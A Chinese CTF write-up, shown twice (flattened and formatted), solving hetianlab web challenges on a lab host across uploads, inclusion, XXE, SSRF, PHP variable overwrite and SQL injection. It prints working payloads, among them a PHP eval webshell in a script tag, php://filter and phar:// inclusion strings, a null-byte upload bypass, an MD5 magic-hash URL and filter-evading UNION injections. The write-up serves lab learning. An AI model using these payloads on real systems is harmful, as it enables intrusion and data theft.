Web-CTF-WriteUp 一、前言旧文，师傅们随便看看二、WriteUp ①、编码 1、神奇的磁带-WriteUp 漏洞地址:10.1.1.147:5001 Burp抓包对应题目，神奇的磁带（tape） flag是：Flag{ctf_victory_SecBug} ②、HTTP基础 2、就差一把钥匙题目描述查看源码没什么东西看看当前页面COOKIE 打开burp抓包没什么东西，然后看了一下标题打开终端扫一下目录都指向console目录根据经验发现XFF没跑了 burp抓包改包拿到flag: flag{hetianlab-weekctf} 3、迷了路题目描述访问网站查看源代码查找一番无果后根据标题猜测跟HTTP的Accept-language有关 8个国家，分别为美国英国法国德国日本韩国西班牙瑞典百度搜了一下美国：en-US 英国：en-gb 法国：fr-fr 德国：de-de 日本：ja-jp/jp 韩国：kr/kor 实测kr并不会返回信息西班牙：es-es 瑞典：sv 拼接flag为：flag{Thisis_hetianlab@} ③、基础代码审计 4、 Check your source code 题目描述访问网站尝试一下admin admin 无果后查看源代码审计题定义俩变量检查post user name 和password 等于检查cookie是不是 check url解密后的username变量全部等于（===你懂的）和url解密后的password不等于admin 意思是账号admin密码不等于admin即可然后setcookie等于ahash然后用base64加密secret变量然后urldecode admin admin，time()为时间7天流程就是抓包把cookie改成check然后加密后的secret和明文的admin与任意密码抓包看到一个base64加密的cookie 解密后这个88应该就是secret这个变量那么把它加密然后把包丢进repeater 名字改为check等于加密后的88 后面跟上admin与任意密码即可注意：check那里的密码必须与下面提交的数据password一样不然会提示重新检查cookie flag{welcome_to_htlab} ④、文件上传 5、 Easy Upload 题目描述访问网站检查提交的源代码新建文件写入phpinfo 点击发送 Flag: flag{hetian@lab_com} 6、套娃一样的文件上传题目描述访问网站看一下提交按钮的javascript 丢到repeater 就只剩下第三层了 LBWNB 17这个数字猜测是提交的数据行 flag{0000_0000_0000} 7、再见上传题目描述访问网站查看源码源代码没有东西直接整抓包上传8 Uploads/后面加上UzJu.php%00 然后点击send发现还是不行后来想了一下好像要改hex flag{asdf_hetianlab_com} 8、随意的上传题目描述访问网站写一个phpinfo上传过滤了<?php php使用Payload <script language="pHp">@eval($_POST['UzJu'])</script> 上传后使用菜刀连接 Flag：flag{0123_4567_8901} ⑤、文件包含 9、试试phpinfo()吧题目描述访问网站 ../phpinfo.php 拉到最底下查看flag Flag: flag{abcd_hetianlab_1234_qwer} 10、试试协议吧题目描述访问网站彳亍解密后 Flag: flag{abdc_1234_qwer_hetian} Payload: php://filter/convert.base64encode/resource=flag.php 11、签到般的包含访问网站新建文件打包成zip 然后将zip文件后缀名改为jpg 上传文件在c盘下有菜刀工具连接地址： http://10.1.1.147:5011/include.php ? file=phar://upload/test.jpg/1 flag{whoami_hetianlab_student} ⑥、XXE 12、simple xxe 访问网站查看源码按照题目提示找到注释说明flag在opt目录下 Flag(hetianlab_ctf) 13、blind xxe 启动apache 进入html目录创建dtd文件修改POST数据抓包后监听即可 flag{hetian_1234_awdr} ⑦、SSRF 14、回显的SSRF 题目描述访问网站直接使用file协议查看flag flag{enter_your_passwd} 15、有点另类的SSRF 题目描述抓包需要POST参数admin 加上XFF 试试xcip flag{0123_hetianlab_hunan} ⑧、代码审计 16、给你丢了串代码题目描述访问网站源代码 <?php include "flag.php"; $_403 = "Access Denied"; $_200 = "Welcome Admin"; if ($_SERVER["REQUEST_METHOD"] != "POST"){ //需要POST方法 die("hetianlab flag is here :biubiubiu"); }if (!isset($_POST["flag"])){ //需要POST参数=flag die($_403); }foreach ($_GET as $key => $value){ //遍历GET方法所传值 $$key = $$value; }foreach ($_POST as $key => $value){ //遍历POST方法所传值 $$key = $value; }if ($_POST["flag"] !== $flag){ die($_403); } echo "This is your flag : ". $flag . "\n"; die($_200); ?> 变量覆盖题 flag{hunan_hetian} 17、学会变量覆盖题目描述查看源代码 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title>学会变量覆盖</title> </head> <body>  </body> </html> 判断gift变量是否存在，否则执行判断 File_get_contents读取flag传给content 判断gift 是否等于content，如果等于content就输出flag 构造gift=&flag= 两个值都为空，判断相等 flag{hetianlab} 18、Easy php 题目描述源代码 <?php highlight_file('source.txt'); echo "<br><br>"; $flag = 'xxxxxxxx'; $msg_giveme = 'Give me the flag!'; $msg_getout = 'No this. Get out!'; if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($msg_giveme); } if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($msg_getout); } foreach ($_POST as $key => $value) { $$key = $value; } foreach ($_GET as $key => $value) { $$key = $$value; } echo 'the flag is : ' . $flag; ?> flag{asdhetianlab} 19、最后一道变量覆盖题目描述 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); if (empty($_GET['id'])) { show_source(__FILE__); die(); } else { include ('flag.php'); $a = "www.hetianlab.com "; $id = $_GET['id']; @parse_str($id); if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) { echo $flag; } else { exit('其实很简单其实并不难！'); } } ?> Parse_str导致的变量覆盖 Payload: http://10.1.1.147:5020/?id=a[0]=s878926199a Php参考： https://www.cnblogs.com/xhds/p/12587249.html#_label2 https://www.cnblogs.com/xhds/p/12349189.html ⑨、SQL注入 20、你的空格哪去了题目描述访问网站简单的查询代码输入1 输入2 提示hacker！可能过滤的’ 或者 and等没有提示hacker 说明没有过滤单引号根据标题发现可能过滤了空格尝试and后也没有过滤and 首先1’order/ /by/ /5# 发现没有信息再尝试1’order/ /by/ /3# 然后使用-1’union/ /select/ /1,2,3# 然后看到我才会告诉你可以用select flag from flag看到Flag尝试 payload:-1'union/ /select/ /1,2,flag/ /from/ /flag# Flag: flag{63564494cac7097c} 21、想想怎么绕过过滤吧题目描述打开发现跟21周的没什么区别只是新增了select过滤直接大小写绕过即可 Payload：-1'union/ /SeLeCt/ /1,2,flag/ /from/ /flag# Flag：flag{ff98f887ddaaad88}

WEB-CTF靶场记录-随便写写

42342

Web-CTF-WriteUp

一、前言

旧文，师傅们随便看看

二、WriteUp

①、编码

1、神奇的磁带-WriteUp

漏洞地址:10.1.1.147:5001
Burp抓包
对应题目，神奇的磁带（tape）

flag是：Flag{ctf_victory_SecBug}

②、HTTP基础

2、就差一把钥匙

题目描述
查看源码

没什么东西看看当前页面COOKIE
打开burp抓包
没什么东西，然后看了一下标题
打开终端扫一下目录
都指向console目录
根据经验发现XFF没跑了 burp抓包改包

拿到flag: flag{hetianlab-weekctf}

3、迷了路

题目描述
访问网站
查看源代码
查找一番无果后根据标题猜测跟HTTP的Accept-language有关
8个国家，分别为美国英国法国德国日本韩国西班牙瑞典百度搜了一下
美国：en-US

英国：en-gb
法国：fr-fr
德国：de-de
日本：ja-jp/jp
韩国：kr/kor 实测kr并不会返回信息
西班牙：es-es
瑞典：sv

拼接flag为：flag{Thisis_hetianlab@}

③、基础代码审计

4、 Check your source code

题目描述
访问网站
尝试一下admin admin 无果后查看源代码
审计题定义俩变量
检查post user name 和password
等于
检查cookie是不是 check
url解密后的username变量全部等于（===你懂的）和url解密后的password不等于admin 意思是账号admin密码不等于admin即可
然后setcookie等于ahash然后用base64加密secret变量然后urldecode admin admin，time()为时间7天
流程就是抓包把cookie改成check然后加密后的secret和明文的admin与任意密码
抓包看到一个base64加密的cookie
解密后
这个88应该就是secret这个变量那么把它加密
然后把包丢进repeater
名字改为check等于加密后的88
后面跟上admin与任意密码即可注意：check那里的密码必须与下面提交的数据password一样不然会提示重新检查cookie

flag{welcome_to_htlab}

④、文件上传

5、 Easy Upload

题目描述
访问网站
检查提交的源代码
新建文件
写入phpinfo
点击发送

Flag: flag{hetian@lab_com}

6、套娃一样的文件上传

题目描述
访问网站
看一下提交按钮的javascript
丢到repeater
就只剩下第三层了
LBWNB 17这个数字猜测是提交的数据

行
flag{0000_0000_0000}

7、再见上传

题目描述
访问网站
查看源码
源代码没有东西直接整抓包上传8
Uploads/后面加上UzJu.php%00 然后点击send发现还是不行
后来想了一下好像要改hex

flag{asdf_hetianlab_com}

8、随意的上传

题目描述
访问网站
写一个phpinfo上传

过滤了<?php php使用Payload

<script language="pHp">@eval($_POST['UzJu'])</script>

上传后使用菜刀连接

Flag：flag{0123_4567_8901}

⑤、文件包含

9、试试phpinfo()吧

题目描述
访问网站
../phpinfo.php
拉到最底下查看flag
Flag: flag{abcd_hetianlab_1234_qwer}

10、试试协议吧

题目描述
访问网站
彳亍解密后

Flag: flag{abdc_1234_qwer_hetian}
Payload: php://filter/convert.base64encode/resource=flag.php

11、签到般的包含

访问网站
新建文件
打包成zip 然后将zip文件后缀名改为jpg
上传文件
在c盘下有菜刀工具连接地址：http://10.1.1.147:5011/include.php?
file=phar://upload/test.jpg/1

flag{whoami_hetianlab_student}

⑥、XXE

12、simple xxe

访问网站查看源码
按照题目提示找到注释说明flag在opt目录下

Flag(hetianlab_ctf)

13、blind xxe

启动apache 进入html目录创建dtd文件
修改POST数据
抓包后监听即可

flag{hetian_1234_awdr}

⑦、SSRF

14、回显的SSRF

题目描述
访问网站直接使用file协议
查看flag

flag{enter_your_passwd}

15、有点另类的SSRF

题目描述
抓包
需要POST参数admin
加上XFF
试试xcip

flag{0123_hetianlab_hunan}

⑧、代码审计

16、给你丢了串代码

题目描述
访问网站

源代码

    <?php
    include "flag.php";
    $_403 = "Access Denied";
    $_200 = "Welcome Admin";
    if ($_SERVER["REQUEST_METHOD"] != "POST"){
        //需要POST方法
        die("hetianlab flag is here :biubiubiu");
    }if (!isset($_POST["flag"])){
        //需要POST参数=flag
        die($_403);
    }foreach ($_GET as $key => $value){
        //遍历GET方法所传值
            $$key = $$value;
        }foreach ($_POST as $key => $value){
        //遍历POST方法所传值
        $$key = $value;
    }if ($_POST["flag"] !== $flag){
        die($_403);
    }
    echo "This is your flag : ". $flag . "\n";
    die($_200);
    ?>

变量覆盖题
flag{hunan_hetian}

17、学会变量覆盖

题目描述

查看源代码

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>学会变量覆盖</title>
</head>
<body>
<!--
$flag='xxxx':
extract($_GET):
if (isset($gift))
Scontent =@trim(file_get_contents($flag)):
if (Sgift = $content)
echo"flag
else
echo ' oh . . ' ;
-->
</body>
</html>

判断gift变量是否存在，否则执行判断
File_get_contents读取flag传给content
判断gift 是否等于content，如果等于content就输出flag
构造gift=&flag= 两个值都为空，判断相等
flag{hetianlab}

18、Easy php

题目描述
源代码

<?php

highlight_file('source.txt');
echo "<br><br>";

$flag = 'xxxxxxxx';
$msg_giveme = 'Give me the flag!';
$msg_getout = 'No this. Get out!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($msg_giveme);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($msg_getout);
}

foreach ($_POST as $key => $value) {
    $$key = $value;
}

foreach ($_GET as $key => $value) {
    $$key = $$value;
}

echo 'the flag is : ' . $flag;

?>

flag{asdhetianlab}

19、最后一道变量覆盖

题目描述

<?php
header("Content-Type: text/html;charset=utf-8");
       error_reporting(0);

       if (empty($_GET['id'])) 
      {
            show_source(__FILE__);
            die();
      } 
      else 
     {
            include ('flag.php');
            $a = "www.hetianlab.com ";
            $id = $_GET['id'];
            @parse_str($id);
            if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) 
           {
                 echo $flag;
           } 
           else 
           {
                 exit('其实很简单其实并不难！');
           }

       }

?>

Parse_str导致的变量覆盖
Payload: http://10.1.1.147:5020/?id=a[0]=s878926199a
Php参考：
https://www.cnblogs.com/xhds/p/12587249.html#_label2
https://www.cnblogs.com/xhds/p/12349189.html

⑨、SQL注入

20、你的空格哪去了

题目描述
访问网站
简单的查询代码输入1
输入2
提示hacker！可能过滤的’ 或者 and等
没有提示hacker 说明没有过滤单引号根据标题发现可能过滤了空格
尝试and后也没有过滤and
首先1’order//by//5#
发现没有信息再尝试1’order//by//3#
然后使用-1’union//select//1,2,3#
然后看到我才会告诉你可以用select flag from flag看到Flag尝试
payload:-1'union//select//1,2,flag//from//flag#

Flag: flag{63564494cac7097c}

21、想想怎么绕过过滤吧

题目描述
打开发现跟21周的没什么区别只是新增了select过滤
直接大小写绕过即可
Payload：-1'union//SeLeCt//1,2,flag//from//flag#

Flag：flag{ff98f887ddaaad88}

47449

那个17张牌太骚了哈哈哈